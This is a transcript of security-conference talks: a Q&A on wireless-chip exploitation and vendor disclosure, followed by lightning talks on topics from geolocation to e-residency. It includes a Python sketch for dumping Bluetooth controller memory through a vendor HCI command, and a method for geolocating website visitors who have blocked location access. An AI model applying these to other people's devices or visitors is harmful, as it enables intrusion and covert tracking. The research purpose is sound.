garbage for like two minutes and try and see what happens, and it would continue listening and asking and confirming, yeah, but that's kind of an overall design issue, I think, and yeah, then there's Windows, and I couldn't find any students to work on Windows, so yeah, so if someone wants to do this, that would be great. And so, another stack, so that's kind of missing here is LTE, and I would call this like the long-term exploitation plan, so it's, I think it's like long-term evolution, evolution, whatever, but exploitation I think is the best thing for the E. 
Yeah, so we have tons of wireless stuff that we are working on, even PowerPC. And then there's Qualcomm, and they have this Qualcomm Hexagon DSP. I hate it so much. There are even source code leaks for their LTE stuff, but it's just such a pain to work on. So you might have noticed that Arash has this LTE project with Qualcomm, but it's just not fun. But other people are doing a lot in this area, and they've already presented here today and yesterday. The first thing is the SIM card in the phone. The SIM card should be a thing that, from my perspective, is secure, because it protects your key material. And then it runs tons of applications, I don't know, and then you can exploit them and get the victim's location, dial premium numbers, launch a browser. And then I didn't really understand, there's this WIB and S@T browser stuff, whatever, and then there's this "launch browser" command, and I think it even launches a browser on the smartphone. It's just crazy. And then I was trying to call Deutsche Telekom, and I'm a business customer, so it's just like a three-minute wait for a call for me, so giving them a call is nice. And the first thing they told me is: you are secure, we know you have three SIM cards and they are all up to date. I have to say, one of them is more than ten years old, but maybe it's up to date. And my question, what exactly is running on my SIM card, was of course not answered. So yeah, something is running there. If you want to know more about SIM cards, there was a talk already yesterday evening, and it's already online. And then there are also a lot of people looking into LTE, and I think the most popular work is by Yongdae Kim. He even built an LTE fuzzing framework that he didn't release publicly so far because of the findings, so it's this question of should you publish, should you not publish, but the findings are super interesting, and he also had students here who just gave a talk this morning. Yeah, responsible disclosure: that's the thing, when you find stuff, you need to disclose it responsibly. And as I said, Jan was writing a lot of emails, and one of the first that he wrote was to ThreadX, because ThreadX is the operating system that runs on the Broadcom Bluetooth chip. He said: your heap is a bit broken and does not have any checks; you could implement the following checks, which are pretty cheap, and then I could not attack it anymore. And then ThreadX answered, which was a bit unexpected, that they already knew about this exploitation technique, and that it is up to the application not to be vulnerable and not to cause any memory corruption. So it's the programmer's fault if they do something wrong, and it's not the operating system that has to take care of the heap.
Yeah, next issue, so the binder thing and the testing, if a vulnerability is still there, so you might not always get feedback from all the vendors, if they fixed it, they might just fix it at a certain point in time, and then you tell them, oh, we tested the next release, and it's still vulnerable, and then they would say, like for example, Samsung said, yeah, we cannot send you patches in advance without an NDA, because Broadcom, blah, blah, blah, and so on and so forth, and then Broadcom offered to send us patches in advance, and I said, yeah, nice, and I also sent them a device list, because they already knew it from the previous process, so if you tell them the following 10 devices have an issue, then they would already know that we can test those devices anyway, and after I sent them the list, they said, oh, wait, but you need an NDA, so no, I mean, we are doing this for free anyway, and then signing an NDA, I wouldn't do that. Yeah, so overall, also the Broadcom product security incident response team is a bit strange, so they wouldn't hand out any CVEs, and what I mean by that is, like, I first get a CVE, and then inform them and all their customers, because I also don't get any incident number or something, so if I wouldn't do this, I wouldn't have any number to refer a vulnerability to, and, well, at least they're also not doing that much legal trouble, but it's just, yeah, not really something happening there, but some of the customers were nice, at least to my students, so they paid, so one customer, they don't want to be named here, but they paid a flight to Defcon for one of my students, and Samsung gave a bounty of $1,000. I mean, still, I mean, we are in the range of way more expensive exploits if it would be on the black market, but for students, it's definitely nice. Yeah, responsibility disclosure timelines. So this is something that I thought, like, maybe some of this responsibility disclosure timeline is just because of how I communicate with the vendor, and sometimes I'm writing emails like a five-year-old or something, I don't know, but actually, so this is a timeline of Quark's lab who also found just this year vulnerabilities in Broadcom Wi-Fi chips, and so they were also asked about NDA, and then also their exploit timeline is a bit fun because they had similar exploitation strategies as in the very first exploits that you could see by Google Project Zero, and then, yeah, more disclosure timeline, whatever, and in the end, well... So it's just taking time and again, no CVE ID issued and so on and so forth, so it's the very same stuff for others, which is pretty sad. And then, so for Cypress, which is partially having source code of Broadcom and also manufacturer's chip, it's also very slow for the responsibility disclosure, and then I got told by other people, like, yeah, if you would disclose something to Qualcomm, it also takes very long, and, well, luckily, we didn't find something in an Intel CPU, but, yeah, there's... So on the wireless market, there's still so many other vendors to become friends with, so, yeah, well... So practical solutions to end my talk. What could you do to defend yourself if you don't have a tinfoil hat? Other things I can recommend is the secure Wi-Fi setup, so don't use antennas, just use antenna cables. We do that in our lab a lot, so this is a setup by Felix, and so when I was sending my slides to Francesco in advance, he just said, like, cool, I have the same one right now at my desktop, so it's a very common setup. 
Maybe not at your home, but for us it is. Or you just go to an air-gapped device: this is my PowerBook 170. That's a really great device, almost impossible to get it online, and it has root access. So, ask all the questions. Thank you very much, Jiska. We still have several minutes left. You will find eight microphones in the room; please line up behind the microphones to ask a question, and the first question goes to the internet. So, hello Jiska, the question is: are the Bluetooth issues you were talking about also present in Bluetooth Low Energy IoT devices? Yes. I mean, there are IoT devices, I cannot tell the vendor, but there are also some popular devices that have Cypress chips, and then it's even worse, because they don't have a separate stack, and often they have an application running on the same ARM core, and then you don't even need any escalation. All right, we have another question at microphone number one, please. Thank you for the talk. My question is: when you fuzzed the Bluetooth Low Energy chip, when you managed to get code execution, did you actually climb up the protocol? Did you access Bluetooth profiles or something like this? Ah, so, for example, for the thing with the link key extraction we were building some proof of concepts, but it depends. We don't currently have a full exploit chain in terms of first on the chip and then on the host; we have something that goes directly at some hosts, but yeah, there are tons of things there to do. Sorry? Yeah, and when you fuzzed the chip itself, how did you actually do it? How did you extract the firmware from the chip? Ah, so Broadcom and Cypress are very nice because they have a Read_RAM command, so you don't need any secure-boot bypass or something, and for the evaluation kits there are even symbols that we found. Symbols only means function names and global variable names, that's it, but that's something to work with. Thank you. Another question from the internet, please. Would you like the return of physical switches for the network controller? Yeah, that would be nice, to physically switch it off. Actually, I don't know where Paul is... ah, here, there's Paul. He's building such a device. When is your talk? At 10 o'clock, Paul is giving a talk about a device where you have a physical switch to turn off your wireless stuff. Okay, the next question is again microphone number one, please. Yeah, thank you. We just bought a new car, and connecting the Bluetooth of my phone to the car's system was very, very hard; I had to reboot the radio several times, and then I found a note that the radio must be directly connected to the CAN bus of the car. So you have a Bluetooth stack connected directly to a CAN bus. It was a very cheap car, but if you have an idea what this means, then... Can you lend me that car? It's a Toyota Aygo, you can get it everywhere. Wow, that shouldn't be. All right, we have a question at microphone number eight, please. Hi, thank you for your talk, first of all. Well, if I understood correctly, you said that the vendors didn't mention if they fixed it or not, or you don't know if they fixed it? Yeah, so it depends. If you look into the Android security updates, for example, August 5th has some Broadcom issue that was fixed, and I know which one that was, and so on and so forth. But then it also means that to get that one onto a Samsung device, I would need...
So they wouldn't build it into the August update, but only into the September update, and then release it in Europe mid or end of September, and then I could download it to my phone and test over the air whether it's really fixed, and so on and so forth. So the first thing is that it's listed publicly that it is fixed, and then the next thing is that it is actually fixed, and the delay is really high. And for the communication with Apple, I don't know; sometimes they fix it silently without mentioning us, and then there's this iOS 13 thing where they mentioned us but didn't fix it, so yeah. Were there any issues that you found where you didn't know if they fixed it or not, and you did patch-diffing or something like that? Yeah, I did a lot of patch-diffing, and I currently have a student who is doing nothing else than developing diffing tools for the particular issues that I have. And did you find that they fixed it or not? Ah, so first of all, it's currently about speed and stuff, and I gave him some iPhone stuff for the next task, but yeah, it's work in progress. Most of the other stuff I did by hand, so I also have a good idea of what changed within each chip generation. Okay, thank you very much. All right, we had another question from the internet. Yes, from Mastodon: how exactly was the snapshot of the Samsung Bluetooth stack extracted for the fuzzing process? So for Samsung we have snapshotting, but we don't have the rest of Frankenstein; the other stuff is running on an evaluation board. The first part is mapping all the hardware registers; this is the first script that runs and tries to find all the memory regions. Once that is done, there is a snapshotting hook that you set on a function. Let's say you want to look into device scanning: you would set a hook into device scanning, and once that is called by the Linux stack, you freeze the whole chip, disable other interrupt stuff that would otherwise kill it, and then copy everything that is in the registers. That is the snapshotting, and once you have a snapshot, you can try to find everything that kills your emulation, like interrupts again and thread switches and so on. All right, we have one more question from microphone number one, please. Okay, so do you think that open-sourcing the driver, or an open hardware design, would improve the situation? Open source, I think, would improve the situation, but one thing, and I gave a talk at MRMCD in September this year about this, which is not about open source, is that the patching capabilities of the Broadcom Bluetooth chips are very limited in terms of how much can be fixed, so just open-sourcing wouldn't help Broadcom, for example. Like, you mean the firmware is burned into the chip and the patching is limited, right? Yeah, so it's in ROM, and then you have Patchram slots, you have like 128 Patchram slots, and each Patchram slot is a four-byte overwrite-breakpoint thingy that branches from somewhere in ROM into RAM, and RAM is also limited, so you couldn't branch into large chunks of RAM all the time. Yeah. Okay, thank you. All right, if there are not any more questions, Internet? Internet? Oh, more Internet questions, then please go ahead. Yes, so Winfreak on Twitter asks: what stack was tested when mentioning Android?
There are several, and Google is convinced that revising it every year is a good idea. Ah, yeah, so the stuff that I tested is the standard stack that runs on a Samsung phone, for example. I think for mainline Android there's only one; I know that there are legacy stacks, but they switched to only one. Yeah. So, Signal Angel, do you have more for us? Yes: what is your hat made of? My hat, so it's aluminium foil, and then there is the cyber thingy, so that's also important. Yeah. But as I said, it doesn't really help. It would help more to put the smartphone in a blender, for example. All right. Thank you very much for this awesome talk. Give a huge round of applause to Jiska. Thank you.
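As a rough illustration of the Read_RAM style firmware dumping mentioned in the Q&A above: Broadcom and Cypress controllers expose vendor-specific HCI commands for reading memory, and tools like InternalBlue wrap them properly. The sketch below hand-builds such a command over a UART (H4) transport. The vendor opcode 0xFC4D (commonly reported for Broadcom Read_RAM), the chunk size, the baud rate and the serial device are assumptions, and the event parsing is deliberately naive, so treat this as a sketch of the idea rather than a working dumper.

    # Sketch: dumping controller memory via a vendor-specific HCI command over
    # a UART (H4) transport. Opcode, chunk size, baud rate and device path are
    # assumptions; real code must parse Command Complete events properly.
    import struct
    import serial  # pyserial

    READ_RAM_OPCODE = 0xFC4D   # assumed Broadcom/Cypress vendor Read_RAM opcode
    CHUNK = 251                # assumed maximum payload per read

    def hci_cmd(opcode, params):
        # H4 framing: 0x01 = command packet, then opcode (LE) and param length
        return bytes([0x01]) + struct.pack("<HB", opcode, len(params)) + params

    def dump(port, start, length, out_path):
        ser = serial.Serial(port, 3000000, timeout=1)
        with open(out_path, "wb") as out:
            addr = start
            while addr < start + length:
                n = min(CHUNK, start + length - addr)
                ser.write(hci_cmd(READ_RAM_OPCODE, struct.pack("<IB", addr, n)))
                evt = ser.read(n + 7)      # naive: event header then data
                out.write(evt[7:7 + n])    # real code parses the event fields
                addr += n

    dump("/dev/ttyUSB0", 0x0, 0x200000, "firmware_dump.bin")  # placeholder values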
Wireless connectivity is an integral part of almost any modern device. These technologies include LTE, Wi-Fi, Bluetooth, and NFC. Attackers in wireless range can send arbitrary signals, which are then processed by the chips and operating systems of these devices. Wireless specifications and standards for those technologies are thousands of pages long, and thus pose a large attack surface. Wireless exploitation is enabled by the technologies any smartphone user uses everyday. Without wireless connectivity our devices are bricked. While we can be more careful to which devices and networks we establish connections to protect ourselves, we cannot disable all wireless chips all the time. Thus, security issues in wireless implementations affect all of us. Wireless chips run a firmware that decodes wireless signals and interprets frames. Any parsing error can lead to code execution within the chip. This is already sufficient to read data passing the chip in plaintext, even if it would be encrypted while transmitted over the air. We will provide a preview into a new tool that enables full-stack Bluetooth fuzzing by real-time firmware emulation, which helps to efficiently identify parsing errors in wireless firmware. Since this kind of bug is within the wireless chips' proprietary firmware, patching requires assistance of the manufacturer. Often, fixing this type of security issue takes multiple months, if done at all. We will tell about our own responsible disclosure experiences, which are both sad and funny. Another risk are drivers in the operating system, which perform a lot of operations on the data they receive from the wireless chip. Most drivers trust the input they get from a wireless chip too much, meaning that wireless exploitation within the chip can easily escalate into the driver. While escalating directly into the operating system is the commonly known option, it is also possible to escalate into other chips. This is a new attack type, which cannot be filtered by the operating system. For everyone who is also concerned during our talk, there will be fancy tin foil hats.
10.5446/53217 (DOI)
The first talk for today is MI Incognito. Hi, I'm Tanoi Bose, my Twitter is Tanoi Bose, and this is a small project that I was doing on privacy, and it's titled MI Incognito. You have a presenter? Yeah, that's right. All right. So, a quick shout-out for this project: there was a lightning talk given at BalCCon by Brian, and do definitely check out the BalCCon booth that's behind this hall. It was a nice starting point for me to get interested in privacy in apps, and also a shout-out to a guy named Smith who basically spoon-fed me the idea when I was stuck at a point. The talk by Brian was about how you could use Tinder and Tinder's APIs to do mapping as well as trilateration to identify a user's location. It was a pretty interesting talk; you should definitely catch up with him if you want to know more about it. So when I was doing my privacy exercise, a lot of the time I opened Google Maps and kept checking how you could plot data over Google Maps and how you can actually figure out information about people via Google Maps. One thing that always caught my attention is that whenever I open Google Maps and stay there for a few seconds, it automatically resolves my approximate location, and you can see some coordinates being appended on Google Maps itself. That was a bit confusing for me, so I approached Google and asked them: how are you storing my data, and what is giving my coordinates away? And Google replied with a definition of an IP address, for people who do not know what an IP address is. You can look at this definition, beautifully explained by Google. Then I asked Google: hey, can you stop sharing my approximate location coordinates? And they were like: we are not sharing your approximate location, we are just getting it from your IP address. Now, location via IP address: this is my location, where the red mark is basically the block where I stay, and of course I am from the Emirates. I looked at my IP address, and the IP-address location of the ISP is about four blocks away from my home, and this is generally the case for our entire city most of the time. However, in Abu Dhabi, if you have a connection, you would find your location to be this point marked on the map, which is significantly farther away from my location. Now, in Chrome there is a setting called location services, which was blocked for my website; all my tests via Chrome were done via my website, a free hosted website. And there is something called Google location services, via which you can do API calls and identify your approximate location, which you generally opt to block, and then the browser should not be able to identify your location anymore. Launching this API call via the browser, I got my approximate location to be somewhere close to my area. What was more interesting was that when I found these things out, I was curious about what was going on, so I approached this guy called Smith, and he was like: hey, why don't you look at Google's geolocation API? And he mentioned a few websites using it and collecting information from users.
So it was interesting, so I go on to the geolocation documentation and I find out that you need to supply it with your Wi-Fi or cell tower data and it will give you your location based on that and if you are not able to supply a Wi-Fi address or cell tower address, it gives you your location based on your IP address. This was interesting because it responds with the latitude, longitude and the accuracy of the location coordinates that has been provided. So of course, when this kind of an API exists, you can script out an easy XHR request, querying the Google API services and host it on any website and what you actually get is nothing but the location coordinates. Even when you have blocked your location, like you can see in the location services on the top that I have blocked it from the website's execution, you can get the coordinates on the website execution. So on the left side is basically the code that executed on the website that I have on my domain and on the right side is the plot for the coordinates. You can see the accuracy is also mentioned, that's around 1,400 meters, that's 1.4 kilometers, that's decently close, however, quite a wide range. You can see it's still away from my block. So yeah, when you, however, turn off your Google GPS spoofer and things like that since I am at modern date in Foylhatt Guy, you can geolocate yourself into your block so I don't allow Google or any services by spoofing my GPS and you can geolocate yourself into it as well as... I'm going to be sorry, five, four, three, two, one. Thank you. Next up is Lern OS. Good morning, Congress. My name is Simon. I'm located at the Send It Center podcasting assembly and I want to make a short pitch for systematic lifelong learning. Lern OS is a term, it's a verb, it's coming from Esperanto, the artificial language and it's the future tense of learning. So it means we will learn or I will learn and I will talk a little bit about how I think how we can hack our own lifelong learning system. The problem that I see is that in more and more knowledge domains, the half-life of knowledge gets shorter and shorter. It's not so much the fact if we talk about knowledge that you acquire at school, about history, things like that. But if you think about especially technology and IT knowledge, the half-life gets shorter and shorter, this means that we have to learn on an ongoing basis and also in a systematic way. Second problem that I see is that our education systems are not prepared at all for teaching us these lifelong learning mechanisms. When you think about school, we send our children to school, it's a very formal approach with a fixed curriculum and fixed teaching methods. We don't really teach them how to learn in a self-organized way. I think same counts for the higher education. In terms of the Bachelor and Master processes, we apply more and more methods that we have in elementary schools also in higher education. And I think it gets even worse if we have a look at the working environments where a lot of people think that when you start working, learning ends because learning was in school and now you have to work. And every day that we spend on learning and trying out new things, it's a waste of money and time. So the idea of this learner as learning hack, so to say, is to put four ingredients together which are well-known methods in the business domain, I think, and also in the IT domain which consists out of four methods. One is SCRUM, the Agile Project Management approach. 
So one idea is to have so-called LENOS or learning sprints of 30 weeks to give yourself a cadence for your learning process. Think of it like having school years or half years in university or in school where the education system or a teacher provides you with material and learning goals and a curriculum. If this formal education ends, then you have to do that on your own. So if you do four sprints a year with classical planning, like planning of the goals, a learning process and a retro at the end, you would do four learning sprints a year, for example. Of course, you can adapt it to your needs. In terms of goals, we tried to use a method called OKR. It was developed by or at Intel in the 80s, already made famous at the end of the 90s at Google. So it's sort of the strategic management system at Google where you try to manage the goals over the levels of the whole cooperation, the individual teams and the individuals. And you just set a moonshot objective, a very ambitious goal for one sprint and have three so-called key results that you can measure what you have at the end of the sprints. So for example, here at the Congress, we tried to develop a guide where you can learn how to podcast and use podcasting as a knowledge sharing tool over one sprint. To get the learning process managed, we used a very old self-organization method called Getting Things Done by David Allen, which kind of replaces the job of the teacher. You organize your learning tasks on your own, put your tasks in a can-band board. We also have working on pre-prepared boards that can use for the learning process to manage the to-dos. And of course, if you did something, we should share what we learned and what we did. And there we use an approach called Working Out Loud, defined as making you work observable. A lot of you, I think, do that by putting stuff on GitHub or publishing presentations like we do here, but also narrating your work, talk about your work, talk about lessons learned, what worked, what didn't work. That's where podcasts come in, for example, where you can talk about what worked and what did not. I put you in the presentation, More Food for Thought for all of the four approaches. There are a lot of sources, like the YouTube we do by Rick Clough from Google Ventures, for example, or the podcast with David Allen talking about Getting Things Done. And the idea in the end is that you learn lifelong from now onwards until the end of your life, so to say. The address is a project that lasts for six years. We are in the middle of it. So there are three years to go. If you want to, there are some addresses where you can join the community, also a Twitter account, no matter if you learn with Lano S or take another approach. I would like to motivate you to keep calm and learn on. Thanks. Thank you. Next up is SMS for you. Hey, good morning. I'm Felix and I want to bring SMS for you. I think it's a valid question. Why do we still need SMS in 2020? That is because not everybody wants to have a smartphone. We have certain services. Think about banks that use SMS for verification in terms of mobile time for verification. Sometimes only GSM is available. And so SMS is the only thing we can send. And at the end, with all the mess of messengers in gated communities, it is still the least common denominator for text messaging. Why not use an SMS in the phone? I think there are a lot of reasons. One is because you are progressive and you want to use other means of communication. 
Maybe you are traveling and in some countries you use a different SIM card and you would still like to be able to receive the messages. Or in my case, I don't want to carry a registered SIM card on my own and carry it with me and get into the whole tracking, worldwide movement profiles and so on. The opposite use case is also valid. Maybe you only have a dumb phone and you are somewhere and you want to send a message to somebody who is not reachable via SMS, or you want to maybe use email or XMPP. So SMS for you to the rescue. It started as a little script. We are now two persons. This is actually a talk because I'm looking for more people that are interested in that and want maybe to jump on and use it. It's a gateway between short messages and other means of communication. Currently we are supporting email. Yes, it's a hack but it works. And XMPP, which is like the more solid approach to it. You need basically a modem, GSM, LTE modem, whatever. You connect it to a Raspberry Pi or other computer and it would receive the SMS, send out an email to you, you can respond to this email, it would send out the SMS back, and the same thing with XMPP. So no matter where you are, no matter whether you have the SIM card with you, you will still receive those kind of old messages. You can find it on GitLab. It's GPL. So we are here on the free side of the nice things. Thank you and check it out. Thank you. Next up is Verif Pal. Let me just open it. There you go. Hello. I'm going to talk about this cool project called Verif Pal. So you guys use Signal, right? Use TLS, use WhatsApp. All of these things are called cryptographic protocols. Cryptographic protocols are the systems that are tasked with assuring certain security guarantees like confidentiality for the communications or authentication and so on. So people design these security protocols and they tend to be really complicated. For example, a relatively sophisticated protocol like Signal has to ensure certain cryptographic properties like forward secrecy. It does this thing where it generates new encryption keys all the time between every message. Other protocols like ZRTP have to have certain considerations because they are dealing with voice chat, like encrypted phone calls, et cetera. And so designing these protocols is really hard. And like for example, TLS went through many revisions like 1.1, 1.2, 1.3. And 1.3 was the very first revision of TLS that was designed while actually working together with people who were formally verifying the design of the protocol. So what does formal verification mean? Formal verification is basically you can basically prove certain things or get assurances about the security guarantees of protocols. Are they resistant to an active attacker? Do they really achieve their security guarantees? So generally speaking, formal verification is kind of an academic thing. And you can see people use maybe the Z3 theorem prover. There's interesting high assurance programming frameworks like F-Star that allow you to write formally verified cryptographic primitives and recently protocols as well. There's also modeling frameworks like ProVerif and Tamarin that allow you to illustrate a model of a protocol. Like for example, a model of Alice and Bob speaking over Signal. And then you can ask questions like, OK, this is a model of Signal. Can an active attacker decrypt Alice's first message to Bob? Can an active attacker impersonate Bob to Alice?
And so you can sort of get a lot of interesting analysis based on the questions that you ask and the models that you make. Now many papers have been published on this and so on, but it's not really used a lot. So why is that? Well, it's because it's complicated. Unless you're a specialist in cryptography, it's unlikely that you will be able to really delve into how Tamarin and Proverif work. So I am working on VerifPal. And so VerifPal also allows you to model and analyze and reason about protocols, but it's really friendly. So it has an intuitive new language for easily describing what Alice and Bob are doing. It has a modeling framework and engine that avoids user error and is easier to use. It even has a user manual that comes with a manga about formal verification, and it's really nice. So please check it out. It can reason about advanced protocols, even though it's really easy to use. It has some advanced features as well. So try it out. You don't have to be a professional or a super extreme advanced person to try it out. Everyone can learn how these systems work and reason about them. We look at the instruction manual as well, the user manual. It's really friendly and accessible. I strongly recommend that you read it. VerifPal is free open source software. It's very new. I only released it a few months ago, and it's still under development, but it's really interesting to use. I hope it's free and open source software under the GPL version 3. So please check it out at verifpal.com. You can download it for Windows, Linux, and Mac OS today and try it out. Thank you very much. Thank you. Next up is Crazy Sequential Representations. Hello, everyone. Today I'm going to tell something about Crazy Sequential Representations, or CSR in short. So CSR are basically mathematical expressions in which all digits occur in order, and this can either be in decreasing order from 9 to 1 or in increasing order from 1 to 9. Ditches may be used as separate numbers, but digits may also be concatenated into larger numbers. And there are basically five operations that you are allowed to use, which are addition, subtraction, multiplication, division, and exponentiation. In addition, parentheses may be used, and finally, numbers may also be negated. In other words, numbers may be used in a positive form, but numbers may also be used in a negative form. On the internet, there's a large list which gives increasing CSR and decreasing CSR for all numbers from 0 up to 11,111. And for all these numbers, CSR has been found, except for the number 10,958. So I thought maybe I can identify this number myself by doing some kind of brute force search. So let's say we want to iterate over all crazy sequential representations, which have three operations in them. And first, we need to go over all the operations, which would look somewhat like this. Then in the next step, we need to go over the different ways numbers can be concatenated, and we need to do this for the increasing order, but we also need to do this for the decreasing order. After this, we need to go over the different parentheses, or at least the meaningful combination of parentheses, and finally, the different ways in which negations can be applied. And instead of doing this for CSR with just three operations, we actually need to do this for CSR with one operation in them, up to CSR with eight operations in them, because they have nine digits, eight operations in between. This gives us about 725 billion different expressions to be evaluated. 
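To make that enumeration concrete, here is a minimal sketch of this kind of search. It is not the speaker's implementation: parenthesization is covered implicitly by recursive splitting, negation is applied to every sub-result, the exponent cap is an assumption to keep the search finite, and it is only demonstrated on a short digit string, because the full 1-to-9 search needs the optimizations discussed next.

    # Sketch of a CSR search: every contiguous split of the digit string combines all values
    # of the left part with all values of the right part.
    from fractions import Fraction
    from functools import lru_cache

    EXP_CAP = 20  # assumed cap on |exponent| so ** stays manageable

    @lru_cache(maxsize=None)
    def reachable(digits: str) -> frozenset:
        values = {Fraction(int(digits))}          # plain concatenation, e.g. "12" -> 12
        for i in range(1, len(digits)):
            for a in reachable(digits[:i]):
                for b in reachable(digits[i:]):
                    values.add(a + b)
                    values.add(a - b)
                    values.add(a * b)
                    if b != 0:
                        values.add(a / b)
                    # exponentiation only for small integer exponents
                    if b.denominator == 1 and abs(b) <= EXP_CAP and not (a == 0 and b < 0):
                        values.add(a ** int(b))
        values |= {-v for v in values}            # negation of any sub-result
        return frozenset(values)

    def has_csr(target: int, digits: str) -> bool:
        return Fraction(target) in reachable(digits)

    # Short example; the full "123456789" search needs the pruning discussed in the talk.
    print(has_csr(24, "1234"))   # True, e.g. 1 * 2 * 3 * 4
    print(has_csr(10, "1234"))   # True, e.g. 1 + 2 + 3 + 4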
However, there are quite some optimizations one can do. For example, in many cases, parentheses make no differences, so you can just skip them. And in many cases, negations tend to cancel each other out, so also need to evaluate these. So we already had our list from zero to 11,000, which was now extended to about 2 billion, which is the upper limit of the 32-bit signed integer. In the increasing series, we have found 931, we have found CSR for 930,000 integers, and in the decreasing series, we have found CSR for about 1.3 million different integers. However, for the number 10958, no CSR was found. Only CSR that approximates the value, some come really close, but none of these CSRs evaluate to the exact number or the exact integer, 10958. We have found many CSRs which have the same length, so all these equations evaluate to the same number and have the same length. For many numbers, we have found expressions without using specific operations. For example, CSR without using subtraction, without using division, without using exponentiation, or without using concatenation of numbers. And for many numbers, we have found expressions in which specific operations occur at specific indexes. I'd like to conclude with the fact that CSR are basically a proof of work, because if you have a list of numbers, it is really hard to get your CSR, but once you have them, it is really easy to confirm that they are correct CSR and evaluate to specific numbers. All this work is available online, and if you have any questions, please send me an email. Thank you. Next up is how to become an Estonian e-resident. So good morning, everybody. My name is Markus, normally working for a great lightning company, and today I want to share my experience to become an e-resident. Two questions to the audience. Who has been to Estonia before? There are some hands, maybe 10. And who is an e-resident already? Nobody. Great. Estonia is one of the Baltic countries in Northern Europe, has only 1.3 million inhabitants. It's quite fairly the size of the Netherlands, and I want to share with you why I think about e-residency and how to become an e-resident, what is the number and facts of e-resident, and at the end maybe how to sign digitally with this. So one question could be to escape from New Zealand, because Estonia is far ahead in the digital world, but the reason is to be part of the state of the art online community. So since 2000, Estonians have arrived to access internet, not the possibility, but the right to do it. Since 2002, they have digital ID cards. You heard from Switzerland that they are thinking about 20 years later to make this ID cards electronically, so they are far ahead. And Estonians can vote online since 2007, and the e-residency started in 2014. And with this, you can establish and manage an EU company online. And by the way, the text declaration is fairly simple and done in some minutes, so it's a quite good advantage. So number of facts, we have about 60,000 e-residents worldwide in 160 countries, and they build roughly 10,000 companies already, which put a revenue of 30 million euros to Estonia already now. So how to become an e-resident? First you have to apply online, leave your ID information, your address, and kind of motivation, which can be fairly simple. Next step is to pay 100 euros, so do it today or tomorrow because it will rise to 120 next year. And for a win-win situation, you can use the referral card of me in the bottom two. 
And then we can win both because it's possible to win a trip to Estonia. The third step is to identify yourself in the embassy. This is the one in Berlin for me, so you have to go there, pick up your card and show your identity, leave your fingerprints, and finally, receive your ID card in this MSC with your name, with your digital ID. So if you have this ID card in your hand, you get also a card reader. It's in this small envelope, and you can now install the card reader software, which of course works in every system you think, so they are far ahead, I told you. You plug in the card in your computer and attach your cards, so then you are able to authenticate yourself with a pin one. So a four-digit pin. And if you sign documents, you can use the pin two, which is five digits. And with this digit or with its authentication, you can sign documents for getting a domain in Estonia or to establish your company when you want to do. So is there anyone I have convinced to become an eResident now? Oh, one, two, yeah, three. That's good. Thanks. Mission completed. And for the rest, if you don't want to be an Estonian eResident, I have another idea. Visit Estonia. It's quite an interesting country. You can learn a lot. And the basic words you need are terre, aiter, negamist, and tervisax. So if you have further questions, feel free to ask me via Twitter, email, LinkedIn, or whatever you like, or later on in this conference here. Thank you for your attention. Thank you. Next up is the infrastructure village. Hello, everybody. I hope you're having a fantastic experience in the cause this year. And let me give you my briefing for an idea that I'm having for next year, and to have an assembly and infrastructure village. And let's see if there is interest for that. And if you're interested to help me run this assembly. So let me start it. Fifty years ago, hacking was practically requiring just a few buttons with the correct tones or some kind of basic electronics in order to start hacking into telephone systems. The years went ahead, and the computers what you really needed were just a few hours on a computer, and then we were going to have computers at home. And nowadays we can even have CPUs with like 64 cores and stuff like that. But actually, the reality is that we use a ton of cores in our day-to-day life, even not directly. Let's say graphics card have like even a couple thousand of cores, routers have a ton of ASIC and other very fast CPUs and processing units. So this is what gave me the idea to create this assembly about, well, whatever you can technically stack, even if this is Raspberry Pi's smart devices for whatever is on, bananas, why not, FPGAs, or even just old school X8664 computers. Aligning with the CCC spirit, all architectures are beautiful. It doesn't matter what. You can do a ton of crazy stuff no matter what. So what are the use cases? Who may be interested in something like that? Well, of course, self-hosting is one very easy example where you do not need clustering per se, but you just delegate different tasks to different systems. Of NSA-proofing can be something very inspiring as well and can create a nice forum around this topic. And of course, red teaming and blue teaming can be very into this kind of stuff. 
As an example, you can have some systems for OSINT gathering and processing, scanning different systems for vulnerabilities, orchestrating your non-consensual clouds, malware or something like that, processing some rainbow tables, cloud in the middle, deploying honeypots, detecting intrusions, some DevSecOps for fancy business-oriented people. So if this is something that you're interested in, reach out to me. I'm going to have this website, infrastructurevillage.com, up very soon. You can find me also on IRC on Hackint with the handle that's up there, or there is my phone number for the Congress for a few more hours here. Thank you very much. Thank you. Next up is how to run a bad awareness campaign. Hello, my name is Christiane Kloos and I want to explain how a bad awareness campaign is run. First of all, what is awareness? Many of you may know it; it's mainly about the security knowledge and behavior of employees regarding the protection of information within an organization, that is, the employees' knowledge of how to behave and how to protect their information. Since social engineering is very often the first step of an attack, it is quite important not only to take technical protection measures, but also to educate people. Today we want to turn the whole thing around and run a bad campaign. That is, our goals are to make the employees unhappy, ideally make them hate the IT department outright, and make sure they learn nothing. So, some tips on how to do that. There are various ways to run an awareness campaign; I focus mainly on a phishing campaign here. The whole thing starts with the mindset that employees are a risk. That is, if we had no employees, there would be no danger for the company, so it might be good to set the whole thing up in a way that lets us get rid of employees who perform badly. We start by not announcing the campaign, that is, we surprise the employees so they have no idea what is happening. We are more successful that way, and they won't like us for it. So only we are successful. Then, mass phishing: we send everyone the same email at the same time, so they can compare notes with each other. That may not make us very successful, because they talk to each other and, instead of everyone falling for it, it becomes more difficult to catch the weaker people. But they definitely don't learn anything, because they have been warned about that particular email. Then of course we can use our admin power, that is, we can simply use the internal mail server and build the perfect phishing campaign that the employees have next to no chance of recognizing. The natural result is that they come away with the impression that IT just wants to trick them and is working against them. And because they have no chance of recognizing the mail, they also don't learn how they could behave when facing a real attacker. We can get personal, that is, we can send emails in the name of colleagues about their private lives, something like "I'm moving out, does anyone want to buy my furniture?". This can have the nice side effect that other people suddenly ask that colleague, hey, you're moving out, what's going on, did something fall apart for you? That makes the employee unhappy in any case, which is not bad either. And we don't explain mistakes, that is, if someone does something wrong, they should just land on some 404 page or something like that.
